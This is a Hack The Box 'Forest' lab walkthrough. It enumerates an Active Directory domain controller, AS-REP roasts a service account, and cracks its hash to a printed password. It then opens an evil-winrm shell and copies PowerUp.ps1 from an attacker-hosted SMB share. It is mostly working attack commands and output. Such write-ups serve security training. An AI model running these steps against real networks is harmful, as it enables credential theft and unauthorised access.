HTB - Forest

23 minute read

Nmap Scan

Performing nmap scan on the target machine,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:17 EDT
Nmap scan report for 10.10.10.161
Host is up (0.26s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-27 06:30:47Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m58s, deviation: 4h02m30s, median: 10m58s
| smb2-time: 
|   date: 2022-03-27T06:31:20
|_  start_date: 2022-03-27T06:22:50
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-03-26T23:31:16-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.21 seconds

Seems like it is an active directory environment and there are lots of services running in it

Scanning for services running in other ports,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:37 EDT
Nmap scan report for 10.10.10.161
Host is up (0.24s latency).
Not shown: 9986 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
53/tcp   open     domain
88/tcp   open     kerberos-sec
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
389/tcp  open     ldap
445/tcp  open     microsoft-ds
464/tcp  open     kpasswd5
593/tcp  open     http-rpc-epmap
636/tcp  open     ldapssl
3268/tcp open     globalcatLDAP
3269/tcp open     globalcatLDAPssl
4793/tcp filtered unknown
5985/tcp open     wsman
9389/tcp open     adws

Nmap done: 1 IP address (1 host up) scanned in 328.70 seconds

Enumeration

From the nmap scan result, we can see that the machine is running on a domain named htb.local

Here, 5985/tcp open wsman is running and it means that PS-Remoting is enabled

We can also find 53/tcp open domain and 389/tcp open ldap running on this machine, which means the target is a Domain Controller

Enumerating SMB

For SMB service,

| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

So we can’t perform relaying attacks since SMB signing is enabled and required

Enumerating SMB with smbmap and smbclient,

┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161          
[+] IP: 10.10.10.161:445        Name: 10.10.10.161                                      
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161 -u monish -p fake
[!] Authentication error on 10.10.10.161

┌──(kaliaidenpearce369)-[~]
└─$ smbclient -L //10.10.10.161 -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

It seems like it requires authentication

Enumerating RPC

Lets enumerate RPC with no pass authentication,

┌──(kaliaidenpearce369)-[~]
└─$ rpcclient 10.10.10.161 -U "" -N
rpcclient $> help
---------------         ----------------------
         MDSSVC
fetch_properties                Fetch connection properties
fetch_attributes                Fetch attribute

...

Since we are able to run commands in RPC, we can even do enumeration about the domain here

Enumerating domain information,

rpcclient $> enumdomains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]

Enumerating domain users,

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Enumerating domain groups,

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

Atleast we got some basic information useful for passive enumeration, it required authentication for active enumeration using rpcclient

We can even query some LDAP information about the user by passing the Relative Identifier (RID), in this case our Domain Admin - Administrator

rpcclient $> queryuser 0x1f4
        User Name   :   Administrator
        Full Name   :   Administrator
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Built-in account for administering the computer/domain
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Sun, 27 Mar 2022 02:23:35 EDT
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 31 Dec 1969 19:00:00 EST
        Password last set Time   :      Mon, 30 Aug 2021 20:51:59 EDT
        Password can change Time :      Tue, 31 Aug 2021 20:51:59 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x1f4
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000061
        padding1[0..7]...
        logon_hrs[0..21]...

Lets query the group details and its members, in this case we will try for Domain Admins group

rpcclient $> querygroup 0x200
        Group Name:     Domain Admins
        Description:    Designated administrators of the domain
        Group Attribute:7
        Num Members:1
rpcclient $> querygroupmem 0x200
        rid:[0x1f4] attr:[0x7]

Enumerating LDAP

Since ldap service is running, lets try to query it with anonymous/null binding

Running ldapsearch,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161  -D "DC=htb,DC=local" -b "DC=htb,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20220327062240.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAOqNrI1l5QUq5WV+CaJoIcQ==
uSNChanged: 888873
name: htb
objectGUID:: Gsfw30mpJkuMe1Lj4stuqw==

...

So we can perform anonymous/null binding,

Lets try passing custom queries to enumerate further,

Searching for Users CN,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161  -D "DC=htb,DC=local" -b "CN=Users,DC=htb,DC=local"  | grep dn
dn: CN=Users,DC=htb,DC=local
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Protected Users,CN=Users,DC=htb,DC=local
dn: CN=Key Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
dn: CN=DnsAdmins,CN=Users,DC=htb,DC=local
dn: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
dn: CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
dn: CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=
dn: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,
dn: CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
dn: CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=
dn: CN=Administrator,CN=Users,DC=htb,DC=local
dn: CN=Guest,CN=Users,DC=htb,DC=local
dn: CN=DefaultAccount,CN=Users,DC=htb,DC=local
dn: CN=krbtgt,CN=Users,DC=htb,DC=local
dn: CN=Domain Computers,CN=Users,DC=htb,DC=local
dn: CN=Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Schema Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Admins,CN=Users,DC=htb,DC=local
dn: CN=Cert Publishers,CN=Users,DC=htb,DC=local
dn: CN=Domain Admins,CN=Users,DC=htb,DC=local
dn: CN=Domain Users,CN=Users,DC=htb,DC=local
dn: CN=Domain Guests,CN=Users,DC=htb,DC=local
dn: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
dn: CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local

So these are the possible accounts available in this domain,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161  -D "DC=htb,DC=local" -b "DC=htb,DC=local" -W "(|(objectClass=person)(objectClass=user))" sAMAccountName | grep sAM
Enter LDAP Password: 
# requesting: sAMAccountName 
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi

Lets try using impacket tools for more detailed output

Using impacket-GetADUsers to list all users in the domain,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetADUsers htb.local/ -dc-ip 10.10.10.161 -no-pass -all
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying 10.10.10.161 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator         Administrator@htb.local         2021-08-30 20:51:58.690463  2022-03-27 02:23:35.195845 
Guest                                                 <never>              <never>             
DefaultAccount                                        <never>              <never>             
krbtgt                                                2019-09-18 06:53:23.467452  <never>             
$331000-VK4ADACQNUCA                                  <never>              <never>             
SM_2c8eef0a09b545acb  SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local  <never>              <never>             
SM_ca8c2ed5bdab4dc9b  SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local  <never>              <never>             
SM_75a538d3025e4db9a  SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local  <never>              <never>             
SM_681f53d4942840e18  DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local  <never>              <never>             
SM_1b41c9286325456bb  Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local  <never>              <never>             
SM_9b69f1b9d2cc45549  FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local  <never>              <never>             
SM_7c96b981967141ebb  SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local  <never>              <never>             
SM_c75ee099d0a64c91b  SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local  <never>              <never>             
SM_1ffab36a2f5f479cb  SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local  <never>              <never>             
HealthMailboxc3d7722  HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local  2019-09-23 18:51:31.892097  2019-09-23 18:57:12.361516 
HealthMailboxfc9daad  HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local  2019-09-23 18:51:35.267114  2019-09-23 18:52:05.736012 
HealthMailboxc0a90c9  HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local  2019-09-19 07:56:35.206329  <never>             
HealthMailbox670628e  HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local  2019-09-19 07:56:45.643993  <never>             
HealthMailbox968e74d  HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local  2019-09-19 07:56:56.143969  <never>             
HealthMailbox6ded678  HealthMailbox6ded67848a234577a1756e072081d01f@htb.local  2019-09-19 07:57:06.597012  <never>             
HealthMailbox83d6781  HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local  2019-09-19 07:57:17.065809  <never>             
HealthMailboxfd87238  HealthMailboxfd87238e536e49e08738480d300e3772@htb.local  2019-09-19 07:57:27.487679  <never>             
HealthMailboxb01ac64  HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local  2019-09-19 07:57:37.878559  <never>             
HealthMailbox7108a4e  HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local  2019-09-19 07:57:48.253341  <never>             
HealthMailbox0659cc1  HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local  2019-09-19 07:57:58.643994  <never>             
sebastien                                             2019-09-19 20:29:59.544725  2019-09-22 18:29:29.586227 
lucinda                                               2019-09-19 20:44:13.233891  <never>             
svc-alfresco                                          2022-03-27 03:22:03.296517  2019-09-23 07:09:47.931194 
andy                                                  2019-09-22 18:44:16.291082  <never>             
mark                                                  2019-09-20 18:57:30.243568  <never>             
santi                                                 2019-09-20 19:02:55.134828  <never> 

And from further enumeration, there are no SPNs and it is running x64 bit architecture

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetUserSPNs  htb.local/ -dc-ip 10.10.10.161 -no-pass 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

No entries found!
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ impacket-getArch -target 10.10.10.161                                      
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.10.10.161 is 64-bit

Initial Access

Lets try to search for a specific user which has DONT_REQUIRE_PREAUTH so that we can perform ASREP-Roasting

Searching for users with DONT_REQUIRE_PREAUTH UAC flag

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161         
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2022-03-27 03:28:19.172241  2019-09-23 07:09:47.931194  0x410200 

Requesting a TGT to crack it to get the plain text password by ASREP-Roasting,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.10.10.161  -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9

Now cracking the TGT using hashcat,

┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -h | grep 18200
  18200 | Kerberos 5 AS-REP etype 23                       | Network Protocols
                                                                                                    
┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -m 18200 '$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9' /opt/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.089e1f35.kernel not found in cache! Building may take a while...


Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9:s3rvice
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40...55b3b9
Time.Started.....: Sun Mar 27 12:56:43 2022 (1 sec)
Time.Estimated...: Sun Mar 27 12:56:44 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18155.2 kH/s (11.80ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4194304/14344385 (29.24%)
Rejected.........: 0/4194304 (0.00%)
Restore.Point....: 3145728/14344385 (21.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: tomabogu -> rogans
Hardware.Mon.#1..: Temp: 59c Util: 45% Core:1665MHz Mem:5500MHz Bus:4

Started: Sun Mar 27 12:56:39 2022
Stopped: Sun Mar 27 12:56:44 2022
                                    

Seems like the password for the account HTB.LOCAL/svc-alfresco is s3rvice

Now lets use evil-winrm to use PS-Remoting to gain shell,

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> hostname
FOREST

Getting the secrets,

*Evil-WinRM* PS C:\Users\svc-alfresco> dir


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/26/2022  11:23 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> more user.txt
<USER FLAG>

Privilege Enumeration

Lets try to enumerate the current privileges of the user,

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                  Alias            S-1-5-32-548                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts                 Group            S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts                       Group            S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\> 

Now lets try to run PowerUp.ps1 to check for any possible privilege escalation,

Transfer files via SMB

┌──(kaliaidenpearce369)-[~]
└─$ locate PowerUp.ps1                                                          
/usr/lib/python3/dist-packages/cme/data/powersploit/Privesc/PowerUp.ps1
/usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1
/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1 .
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ mkdir SMBShare   
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ cp PowerUp.ps1  SMBShare/

┌──(kaliaidenpearce369)-[~]
└─$ impacket-smbserver MONISH SMBShare 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

...

Copying our scripts in a writable location,

*Evil-WinRM* PS C:\Users\svc-alfresco> copy \\10.10.14.4\MONISH\PowerUp.ps1 .
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        3/27/2022   1:18 AM         563259 PowerUp.ps1

Running PowerUp.ps1 became useless causing some privilege and WMI errors

Running SharpHound

Lets try to gather information using SharpHound and load the output from ingestors into BloodHound to analyse the shortest path

Copying it on our target machine and running the ingestors,

